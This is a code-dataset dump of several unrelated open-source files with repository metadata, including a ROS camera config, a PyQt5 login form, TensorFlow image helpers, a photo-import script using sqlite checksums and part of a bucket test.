'const char * const', 'value': 'start', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStartTime'}, {'srcline': 55, 'description': 'Time when raw frame capture ended', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'stop', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStopTime'}, {'srcline': 56, 'description': 'Time when camera-to-host transfer completed', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'hostrcpt', 'ctype': 'std::string', 'type': 'str', 'name': 'HostReceiptTime'}]}", 'default': 'start', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'ROS tf frame of reference, resolved with tf_prefix unless absolute.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_id', 'edit_method': '', 'default': 'camera', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Path to camera calibration file.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'camera_info_url', 'edit_method': '', 'default': '', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Scanning mode.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'scanning_mode', 'edit_method': "{'enum_description': 'Scanning modes', 'enum': [{'srcline': 72, 'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Interlaced'}, {'srcline': 73, 
'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Progressive'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Auto exposure mode.', 'max': 3, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure', 'edit_method': "{'enum_description': 'Auto-exposure modes', 'enum': [{'srcline': 80, 'description': 'Manual exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Manual'}, {'srcline': 81, 'description': 'Auto exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Auto'}, {'srcline': 82, 'description': 'manual exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 2, 'ctype': 'int', 'type': 'int', 'name': 'Shutter_Priority'}, {'srcline': 83, 'description': 'auto exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 3, 'ctype': 'int', 'type': 'int', 'name': 'Aperture_Priority'}]}", 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'In auto mode or shutter priority mode, allow the device to vary frame rate.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure_priority', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 
'Length of exposure, seconds.', 'max': 10.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'exposure_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0001, 'type': 'double'}, {'srcline': 290, 'description': 'Aperture, f.', 'max': 655.35, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'iris_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Maintain focus automatically.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_focus', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Absolute focal distance, millimeters.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'focus_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Pan (clockwise), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'pan_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 'Tilt (up), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'tilt_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 
'Roll (clockwise), degrees.', 'max': 180, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'roll_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -180, 'type': 'int'}, {'srcline': 290, 'description': 'Image capture disabled.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'privacy', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Backlight compensation, device-dependent (zero for none, increasing compensation above zero).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'backlight_compensation', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Brightness, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'brightness', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Contrast, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'contrast', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Gain, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gain', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 
290, 'description': 'Power line frequency anti-flicker processing.', 'max': 2, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'power_line_frequency', 'edit_method': "{'enum_description': 'Power line frequency modes', 'enum': [{'srcline': 146, 'description': 'Disabled', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Disabled'}, {'srcline': 147, 'description': '50 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_50'}, {'srcline': 148, 'description': '60 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_60'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Automatic hue control.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_hue', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Hue, degrees.', 'max': 180.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'hue', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': -180.0, 'type': 'double'}, {'srcline': 290, 'description': 'Saturation, device dependent (zero for grayscale).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'saturation', 'edit_method': '', 'default': 
0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image sharpness, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'sharpness', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Gamma.', 'max': 5.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gamma', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.01, 'type': 'double'}, {'srcline': 290, 'description': 'Automatic white balance.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_white_balance', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'White balance temperature, degrees.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_temperature', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blue or U component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_BU', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Red or V component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 
'name': 'white_balance_RV', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}], 'type': '', 'id': 0}
min = {}
max = {}
defaults = {}
level = {}
type = {}
all_level = 0
#def extract_params(config):
# params = []
# params.extend(config['parameters'])
# for group in config['groups']:
# params.extend(extract_params(group))
# return params
for param in extract_params(config_description):
min[param['name']] = param['min']
max[param['name']] = param['max']
defaults[param['name']] = param['default']
level[param['name']] = param['level']
type[param['name']] = param['type']
all_level = all_level | param['level']
UVCCamera_uncompressed = 'uncompressed'
UVCCamera_compressed = 'compressed'
UVCCamera_yuyv = 'yuyv'
UVCCamera_uyvy = 'uyvy'
UVCCamera_rgb = 'rgb'
UVCCamera_bgr = 'bgr'
UVCCamera_mjpeg = 'mjpeg'
UVCCamera_gray8 = 'gray8'
UVCCamera_PubTime = 'pub'
UVCCamera_FrameStartTime = 'start'
UVCCamera_FrameStopTime = 'stop'
UVCCamera_HostReceiptTime = 'hostrcpt'
UVCCamera_Interlaced = 0
UVCCamera_Progressive = 1
UVCCamera_Manual = 0
UVCCamera_Auto = 1
UVCCamera_Shutter_Priority = 2
UVCCamera_Aperture_Priority = 3
UVCCamera_Disabled = 0
UVCCamera_Freq_50 = 1
UVCCamera_Freq_60 = 1
| 0 | 0 | 0 |
76262c3f52cb6bdee076ea934eea9911ec7e90fe | 16 | py | Python | trackhub/settings.py | mauranolab/trackhub | ef4bc46810c370dc9422c549c34fc70e17cf5e32 | [
"MIT"
] | 36 | 2015-01-02T10:12:54.000Z | 2021-09-13T14:17:03.000Z | trackhub/settings.py | daler/trackhub | 3127aa3eb263b71ff0bea47c84aaf42aef520816 | [
"MIT"
] | 21 | 2015-01-02T11:59:20.000Z | 2021-02-19T21:30:43.000Z | trackhub/settings.py | daler/trackhub | 3127aa3eb263b71ff0bea47c84aaf42aef520816 | [
"MIT"
] | 11 | 2015-04-15T10:13:38.000Z | 2020-10-30T11:43:57.000Z | VALIDATE = True
| 8 | 15 | 0.75 | VALIDATE = True
| 0 | 0 | 0 |
3141a149e0e147fb3f5268ae3e05948ad4da7719 | 4,760 | py | Python | log-in.py | NoNameGr/NoName | e437ada090612bb44de0524affb66348537eda56 | [
"MIT"
] | null | null | null | log-in.py | NoNameGr/NoName | e437ada090612bb44de0524affb66348537eda56 | [
"MIT"
] | null | null | null | log-in.py | NoNameGr/NoName | e437ada090612bb44de0524affb66348537eda56 | [
"MIT"
] | 2 | 2020-07-30T04:10:37.000Z | 2020-07-30T04:15:10.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'log-in.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
| 44.485981 | 88 | 0.683193 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'log-in.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(399, 427)
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(20, 110, 91, 31))
font = QtGui.QFont()
font.setPointSize(17)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(20, 150, 91, 31))
font = QtGui.QFont()
font.setPointSize(17)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.textEdit = QtWidgets.QTextEdit(Dialog)
self.textEdit.setGeometry(QtCore.QRect(120, 110, 256, 31))
self.textEdit.setObjectName("textEdit")
self.textEdit_2 = QtWidgets.QTextEdit(Dialog)
self.textEdit_2.setGeometry(QtCore.QRect(120, 150, 256, 31))
self.textEdit_2.setObjectName("textEdit_2")
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(120, 30, 191, 51))
font = QtGui.QFont()
font.setPointSize(22)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(250, 200, 121, 41))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
self.commandLinkButton_2 = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton_2.setGeometry(QtCore.QRect(150, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton_2.setFont(font)
self.commandLinkButton_2.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton_2.setCheckable(False)
self.commandLinkButton_2.setDescription("")
self.commandLinkButton_2.setObjectName("commandLinkButton_2")
self.commandLinkButton_3 = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton_3.setGeometry(QtCore.QRect(280, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton_3.setFont(font)
self.commandLinkButton_3.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton_3.setCheckable(False)
self.commandLinkButton_3.setDescription("")
self.commandLinkButton_3.setObjectName("commandLinkButton_3")
self.commandLinkButton = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton.setGeometry(QtCore.QRect(10, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton.setFont(font)
self.commandLinkButton.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton.setCheckable(False)
self.commandLinkButton.setDescription("")
self.commandLinkButton.setObjectName("commandLinkButton")
self.label_4 = QtWidgets.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(100, 250, 221, 16))
self.label_4.setObjectName("label_4")
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(130, 270, 151, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "User : "))
self.label_2.setText(_translate("Dialog", "Password : "))
self.label_3.setText(_translate("Dialog", "Đuổi hình bắt chữ "))
self.pushButton.setText(_translate("Dialog", "Log in"))
self.commandLinkButton_2.setText(_translate("Dialog", "Google"))
self.commandLinkButton_3.setText(_translate("Dialog", "Twitter"))
self.commandLinkButton.setText(_translate("Dialog", "Facebook"))
self.label_4.setText(_translate("Dialog", "Bạn chưa có tài khoản đăng nhập ? "))
self.pushButton_2.setText(_translate("Dialog", "Create free account "))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
| 4,159 | 3 | 76 |
0f7be76eca4e901701b16ef946c1cad8131f3dd7 | 978 | py | Python | data_pipeline/tf_helper.py | drah/UGATIT | 69c7f6d9887407f21c900a8bdf952e65cdcbc8a6 | [
"Apache-2.0"
] | null | null | null | data_pipeline/tf_helper.py | drah/UGATIT | 69c7f6d9887407f21c900a8bdf952e65cdcbc8a6 | [
"Apache-2.0"
] | null | null | null | data_pipeline/tf_helper.py | drah/UGATIT | 69c7f6d9887407f21c900a8bdf952e65cdcbc8a6 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
| 27.942857 | 89 | 0.696319 | import tensorflow as tf
def read_image(image_path):
content = tf.read_file(image_path)
image = tf.image.decode_image(content)
return image
def resize_images(images, dest_hw):
images = tf.cast(images, tf.float32)
if images.shape.rank == 3:
images = tf.expand_dims(images, 0)
images = _resize_images_if_need(images, dest_hw)
images = images[0]
else:
images = _resize_images_if_need(images, dest_hw)
return images
def _resize_images_if_need(images, dest_hw):
resized = tf.image.resize(images, dest_hw)
images = tf.cond(
tf.reduce_all(tf.equal(tf.shape(images)[1:3], dest_hw)),
lambda: images,
lambda: resized)
return images
def random_crop(images, dest_hw):
if len(images.shape) == 3:
images = tf.image.random_crop(images, tf.concat([dest_hw, tf.shape(images)[-1:]], 0))
else:
shape = tf.shape(images)
images = tf.image.random_crop(images, tf.concat([shape[0:], dest_hw, shape[-1:], 0]))
return images | 861 | 0 | 92 |
fe7279ff6c2685a69f9f9d759391b1e8976cada1 | 5,846 | py | Python | workflow.py | f0xd3v1lsw1ld/photoworkflow | 22397e7a474798da5f207586fbabc9b869017ef0 | [
"MIT"
] | null | null | null | workflow.py | f0xd3v1lsw1ld/photoworkflow | 22397e7a474798da5f207586fbabc9b869017ef0 | [
"MIT"
] | null | null | null | workflow.py | f0xd3v1lsw1ld/photoworkflow | 22397e7a474798da5f207586fbabc9b869017ef0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#######################################################################################################################################################################
#The MIT License (MIT)
#Copyright (c) Copyright 2016, f0xd3v1lsw1ld@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#######################################################################################################################################################################
import os
import os.path
import hashlib
import sys
import sqlite3
import argparse
import shutil
#methode to calculate md5sum of a given file
#return te md5sum as string or 0
#methode to check if a given md5sum is already in the database
#if not, it will be insert
#return True if it's in the database, False otherwise
#methode to copy given file in the given directory
#return True if successful, False if not
#main methode
#handles input parameter for file extension and temporary Working directory
#creates database, if it not exists
#main loop:
# - loop over all files with given extension
# - calc their md5sum and check if these are already in the database
# - if not, copy this files in the temporary Working directory and print the filename
if __name__ == '__main__':
main()
| 40.317241 | 167 | 0.609819 | #!/usr/bin/python
#######################################################################################################################################################################
#The MIT License (MIT)
#Copyright (c) Copyright 2016, f0xd3v1lsw1ld@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#######################################################################################################################################################################
import os
import os.path
import hashlib
import sys
import sqlite3
import argparse
import shutil
#methode to calculate md5sum of a given file
#return te md5sum as string or 0
def getMd5Sum(_file):
    """Return the MD5 hex digest of *_file* as a string, or 0 on I/O error.

    The file is read in 1 MiB chunks so arbitrarily large files can be
    hashed without loading them fully into memory.
    """
    # init hashlib to calculate md5
    md5_returned = hashlib.md5()
    blocksize = 2 ** 20  # 1 MiB read granularity
    try:
        # Open, read and close the file, feeding the hash incrementally.
        with open(_file, "rb") as file_to_check:
            while True:
                data = file_to_check.read(blocksize)
                if not data:  # EOF reached
                    break
                md5_returned.update(data)
        # return calculated md5
        return str(md5_returned.hexdigest())
    except IOError:
        # BUG FIX: the original printed the undefined name `file_name`,
        # which raised a NameError instead of reporting the failure.
        print("Error opening " + _file)
        return 0
#methode to check if a given md5sum is already in the database
#if not, it will be insert
#return True if it's in the database, False otherwise
def inDatabase(_db_filename, _md5):
    """Check whether *_md5* is already recorded in tblmd5sum.

    Returns True if the checksum exists; otherwise inserts it and
    returns False. Also returns False on any database error (logged
    to stdout), preserving the original best-effort behaviour.
    """
    try:
        with sqlite3.connect(_db_filename) as conn:
            # SECURITY FIX: use a parameterized query. The original
            # interpolated _md5 straight into the SQL text with `%`,
            # which is vulnerable to SQL injection and breaks on quotes.
            data = conn.execute("SELECT * FROM tblmd5sum WHERE md5sum == ?", (_md5,))
            result = data.fetchone()
            if result is not None:
                return True
            conn.execute("INSERT OR IGNORE INTO tblmd5sum (md5sum) VALUES(?)", (_md5,))
            conn.commit()
            return False
    except Exception as e:
        print(e)
        return False
#methode to copy given file in the given directory
#return True if successful, False if not
def copyFileInWrkDir(_file, _dir):
    """Copy *_file* (metadata included) into *_dir*.

    Returns True on success; on any failure the error is printed and
    False is returned.
    """
    try:
        shutil.copy2(_file, _dir)
    except Exception as err:
        print(err)
        return False
    return True
#main methode
#handles input parameter for file extension and temporary Working directory
#creates database, if it not exists
#main loop:
# - loop over all files with given extension
# - calc their md5sum and check if these are already in the database
# - if not, copy this files in the temporary Working directory and print the filename
def main():
    # Photo-import workflow entry point:
    #  * parse CLI options (image extension, source/working directory)
    #  * create ~/.photoworkflow/ and its sqlite DB from schema.sql on first run
    #  * md5-hash every matching file; checksums not yet in the DB are
    #    recorded and the files copied into the working directory
    parser = argparse.ArgumentParser(description='Photo import workflow')
    parser.add_argument('-t', action="store", dest='type', default="JPG", help='Select image type, i.e. JPG, CR2..')
    parser.add_argument('-d', action="store", dest="dir", default=".", help='Path to temporary Working directory')
    results = parser.parse_args()
    pathname = os.path.dirname(sys.argv[0])
    home_dir = os.path.expanduser('~') + "/.photoworkflow/"
    db_filename = home_dir + 'pictures.db'
    schema_filename = pathname + '/schema.sql'  # schema ships next to the script
    if len(sys.argv) == 1:
        # no arguments at all -> show usage and bail out
        parser.print_help()
        sys.exit(-1)
    if not os.path.exists(home_dir):
        try:
            print("create dir %s" % home_dir)
            os.makedirs(home_dir)
        except Exception as e:
            print(e)
            return
    # NOTE(review): despite its name, db_is_new is True when the DB file
    # already exists; the schema is only created when it is False.
    db_is_new = os.path.exists(db_filename)
    if db_is_new == False:
        try:
            with sqlite3.connect(db_filename) as conn:
                # print ('Creating schema')
                with open(schema_filename, 'rt') as f:
                    schema = f.read()
                conn.executescript(schema)
        except Exception as e:
            print(e)
            return
    # get all files of type results.type of directory results.dir
    files = [f for f in os.listdir(results.dir) if f.endswith("." + results.type) and os.path.isfile(os.path.join(results.dir, f))]
    # get number of found files
    file_counter = len(files)
    print("Step 1: calculate checksum and lookup in database")
    # proceed all found files
    cnt_file = 1
    for file in files:
        md5 = getMd5Sum(results.dir + '/' + file)
        entry = inDatabase(db_filename, md5)
        # 2016.07.16 https://stackoverflow.com/questions/517127/how-do-i-write-output-in-same-place-on-the-console
        sys.stdout.write("progress [%d / %d] \r" % (cnt_file, file_counter) )
        sys.stdout.flush()
        cnt_file = cnt_file + 1
        if entry == False:
            # checksum unseen so far: stage the file and drop a marker file
            copyFileInWrkDir(results.dir + '/' + file, home_dir)
            if not os.path.isfile(home_dir + '/' + "newfile"):
                open(home_dir + '/' + "newfile", 'a').close()
    sys.stdout.write("\n")
if __name__ == '__main__':
main()
| 3,478 | 0 | 88 |
df0a868be33c72b8e8b4f9d52ceddcaad2ddc46b | 1,560 | py | Python | jacquard/buckets/tests/test_bucket.py | peteowlett/jacquard | 772fd633e521501688e0933482cba45f48c23ef9 | [
"MIT"
] | null | null | null | jacquard/buckets/tests/test_bucket.py | peteowlett/jacquard | 772fd633e521501688e0933482cba45f48c23ef9 | [
"MIT"
] | null | null | null | jacquard/buckets/tests/test_bucket.py | peteowlett/jacquard | 772fd633e521501688e0933482cba45f48c23ef9 | [
"MIT"
] | null | null | null | import pytest
from jacquard.odm import Session
from jacquard.buckets import Bucket
from jacquard.constraints import Constraints
from jacquard.buckets.utils import release
from jacquard.buckets.constants import NUM_BUCKETS
from jacquard.buckets.exceptions import NotEnoughBucketsException
@pytest.mark.parametrize('divisor', (
2,
3,
4,
5,
6,
10,
100,
))
| 23.636364 | 75 | 0.608974 | import pytest
from jacquard.odm import Session
from jacquard.buckets import Bucket
from jacquard.constraints import Constraints
from jacquard.buckets.utils import release
from jacquard.buckets.constants import NUM_BUCKETS
from jacquard.buckets.exceptions import NotEnoughBucketsException
@pytest.mark.parametrize('divisor', (
    2,
    3,
    4,
    5,
    6,
    10,
    100,
))
def test_divisible(divisor):
    # The total bucket count must split evenly for these common divisors.
    assert NUM_BUCKETS % divisor == 0
def test_at_least_three_buckets_per_percent():
    # One percent of traffic must map to at least three whole buckets.
